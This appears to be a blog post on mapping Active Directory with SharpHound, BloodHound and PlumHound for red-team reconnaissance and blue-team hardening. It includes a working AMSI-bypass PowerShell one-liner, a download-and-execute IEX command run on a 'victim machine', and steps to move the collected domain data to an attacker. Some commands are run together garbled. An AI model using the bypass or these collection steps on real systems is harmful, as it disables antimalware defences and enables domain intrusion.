BloodHound + PlumHound = ❤

Jessy De Taranto
4 min readAug 24, 2021

BloodHound is a graphical tool both attackers and defenders use to reveal secrets and hidden relationships within an Active Directory environment. In this case, though BloodHound is used for identifying and eliminating attack paths for Blue Teams, it is also used by Red Teams and malicious APT groups to discover hidden tracks for lateral movement in an Active Directory domain.

1. SharpHound

In order to graph data via BloodHound, SharpHound should be executed on the victim machine for data collection regarding the information in an Active Directory domain. SharpHound is the official data collector for BloodHound and can be found as both in PowerShell script and C# (compiled to .exe).

Without any flags given to SharpHound, the information below can be collected into a zip file:

  • Security group memberships
  • Domain trusts
  • Abusable rights on Active Directory objects
  • Group Policy links
  • OU tree structure
  • Several properties from computer, group and user objects
  • SQL admin links
  • The members of the local administrators, remote desktop, distributed COM, and remote management groups
  • Active sessions, which SharpHound will attempt to correlate to systems where users are interactively logged on

More information can be found in the official document site of BloodHound:

P.S. Firstly, some AMSI-Bypass won’t hurt if these below don’t work. Check out and my teammate F’s fav (Hey ZemarKhos 🙌):

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like “*iUtils”) {$c=$b}};$d=$c.GetFields(‘NonPublic,Static’);Foreach($e in $d) {if ($e.Name -like “*Context”) {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

Method 1: SharpHound can be downloaded on the attacker machine as “SharpHound.ps1”, imported and executed with the Collection Method of “all” for the most information about the domain.

powershell -ep bypass. .\Sharphound.ps1Invoke-Bloodhound -CollectionMethod All -Domain <DOMAIN_NAME>

Method 2: SharpHound can be downloaded and executed in the victim machine with an example oneliner below:

powershell -ep bypass "IEX(New-Object Net.Webclient).DownloadString('');Invoke-Bloodhound"

The output zip file should be uploaded to the attacker machine for further investigation of the related domain.

2. BloodHound

The output zip file which was downloaded earlier should be imported to BloodHound. BloodHound can be downloaded in Linux machines with the commands below:

apt install bloodhoundneo4j console  // Open the console on your browser.   username: neo4j   password: neo4j  // Asks you to change the password.bloodhound   username: neo4j   password: <new password>

The output zip file can be imported from “Upload Data” button on the right of the BloodHound GUI screen.

After the upload completes, pre-build queries and their graphs can be observed:

An example from the demonstration can be seen below:

3. PlumHound

Although BloodHound is a powerful tool to graph Active Directory, it can be mind-bending to correlate between information on maps of large networks… like, you know... like this:

To end the confusion over graphs, a new tool was introduced: PlumHound. PlumHound, which was essentially written for Blue and Purple Teams, operates by wrapping BloodHoundAD’s Neo4J backend cipher queries into reports. Blue and Purple Teams can identify and harden Active Directory configuration vulnerabilities by analyzing the output reports of PlumHound.

A collection output of SharpHound and an operating BloodHound should be active to generate reports with PlumHound. Installation and usage can be found below:

git clone install python3cd PlumHoundpip3 install -r requirements.txtpython3 -x tasks/default.tasks -s "bolt://" -u "neo4j" -p "<password>" -v 0 --HTMLCSS template/html.css

All reports can be accessed from the directory: “PlumHound/reports/Reports.html”

Reports include (a long list I cannot write!):

  • Domain Users
  • Domain Controllers
  • Kerberoastable Users
  • RDPable Servers
  • Unconstrained Delegation Computers with SPN
  • Admin Groups
  • RDPable Groups
  • RDPable Groups Count
  • LocalAdminGroups

Screenshots of the report samples from the demonstration can be seen below:

Happy hunting? :)